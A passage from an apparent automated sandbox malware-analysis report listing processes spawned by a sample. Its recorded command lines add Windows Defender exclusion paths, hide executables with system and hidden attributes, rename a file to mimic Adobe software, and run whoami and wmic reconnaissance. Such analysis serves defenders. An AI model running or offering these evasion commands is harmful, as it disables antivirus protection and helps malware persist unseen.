Start date:	14/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exe PID: 5624 Parent PID: 924

General

Start time:	19:11:51
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 4632 Parent PID: 7120

General

Start time:	19:11:51
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: whoami.exe PID: 5872 Parent PID: 924

General

Start time:	19:11:51
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5924 Parent PID: 4632

General

Start time:	19:11:51
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: reg.exe PID: 6152 Parent PID: 4632

General

Start time:	19:11:52
Start date:	14/01/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Trion Softworks" /f
Imagebase:	0x7ff7f2ad0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 5968 Parent PID: 7120

General

Start time:	19:11:53
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6200 Parent PID: 5968

General

Start time:	19:11:53
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 5648 Parent PID: 7120

General

Start time:	19:11:53
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: whoami.exe PID: 5952 Parent PID: 5968

General

Start time:	19:11:53
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 4360 Parent PID: 7120

General

Start time:	19:11:53
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5016 Parent PID: 5648

General

Start time:	19:11:54
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 3348 Parent PID: 4360

General

Start time:	19:11:54
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 5116 Parent PID: 7120

General

Start time:	19:11:54
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic cpu get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 6504 Parent PID: 5648

General

Start time:	19:11:54
Start date:	14/01/2022
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Imagebase:	0x7ff7e1670000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 2924 Parent PID: 4360

General

Start time:	19:11:54
Start date:	14/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exe PID: 6088 Parent PID: 5116

General

Start time:	19:11:54
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 6780 Parent PID: 5116

General

Start time:	19:11:55
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic cpu get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: acrotray.exe PID: 5268 Parent PID: 3352

General

Start time:	19:11:56
Start date:	14/01/2022
Path:	C:\Windows\acrotray.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\acrotray.exe"
Imagebase:	0x400000
File size:	1843200 bytes
MD5 hash:	8FB77EDBAE0C40E1E19D82A406B7615A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6312 Parent PID: 5268

General

Start time:	19:11:58
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 2328 Parent PID: 5268

General

Start time:	19:11:58
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4484 Parent PID: 6312

General

Start time:	19:11:58
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6240 Parent PID: 2328

General

Start time:	19:11:58
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 7116 Parent PID: 7120

General

Start time:	19:11:59
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6068 Parent PID: 5268

General

Start time:	19:11:59
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 5572 Parent PID: 2328

General

Start time:	19:11:59
Start date:	14/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exe PID: 3932 Parent PID: 7116

General

Start time:	19:11:59
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 1904 Parent PID: 5268

General

Start time:	19:11:59
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5616 Parent PID: 6068

General

Start time:	19:11:59
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 5964 Parent PID: 7116

General

Start time:	19:12:00
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6488 Parent PID: 1904

General

Start time:	19:12:00
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: whoami.exe PID: 5580 Parent PID: 6068

General

Start time:	19:12:00
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: reg.exe PID: 6636 Parent PID: 1904

General

Start time:	19:12:00
Start date:	14/01/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Mystic Entertainment" /f
Imagebase:	0x7ff7f2ad0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 5544 Parent PID: 5268

General

Start time:	19:12:01
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6300 Parent PID: 5268

General

Start time:	19:12:02
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 3732 Parent PID: 5544

General

Start time:	19:12:02
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70d6e0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 5848 Parent PID: 5268

General

Start time:	19:12:02
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4432 Parent PID: 6300

General

Start time:	19:12:02
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: whoami.exe PID: 3200 Parent PID: 5544

General

Start time:	19:12:02
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4936 Parent PID: 5848

General

Start time:	19:12:02
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 6780 Parent PID: 6300

General

Start time:	19:12:03
Start date:	14/01/2022
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Imagebase:	0x7ff7e1670000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 1068 Parent PID: 5848

General

Start time:	19:12:03
Start date:	14/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Analysis Process: cmd.exe PID: 4624 Parent PID: 7120

General

Start time:	19:12:05
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C ver
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6636 Parent PID: 5268

General

Start time:	19:12:06
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic cpu get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 1904 Parent PID: 4624

General

Start time:	19:12:06
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4348 Parent PID: 6636

General

Start time:	19:12:07
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 7084 Parent PID: 7120

General

Start time:	19:12:07
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 2828 Parent PID: 6636

General

Start time:	19:12:07
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic cpu get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 2260 Parent PID: 7084

General

Start time:	19:12:07
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 1760 Parent PID: 7084

General

Start time:	19:12:08
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6868 Parent PID: 5268

General

Start time:	19:12:10
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5624 Parent PID: 6868

General

Start time:	19:12:10
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 4488 Parent PID: 6868

General

Start time:	19:12:11
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6628 Parent PID: 5268

General

Start time:	19:12:13
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C ver
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6196 Parent PID: 6628

General

Start time:	19:12:13
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3696 Parent PID: 5268

General

Start time:	19:12:14
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6068 Parent PID: 3696

General

Start time:	19:12:14
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 3336 Parent PID: 3696

General

Start time:	19:12:14
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3076 Parent PID: 5268

General

Start time:	19:12:31
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6632 Parent PID: 7120

General

Start time:	19:12:31
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 3180 Parent PID: 3076

General

Start time:	19:12:31
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4632 Parent PID: 6632

General

Start time:	19:12:31
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: whoami.exe PID: 5684 Parent PID: 3076

General

Start time:	19:12:32
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: whoami.exe PID: 1244 Parent PID: 6632

General

Start time:	19:12:32
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 7080 Parent PID: 5268

General

Start time:	19:12:33
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6788 Parent PID: 7120

General

Start time:	19:12:33
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 3752 Parent PID: 7080

General

Start time:	19:12:33
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
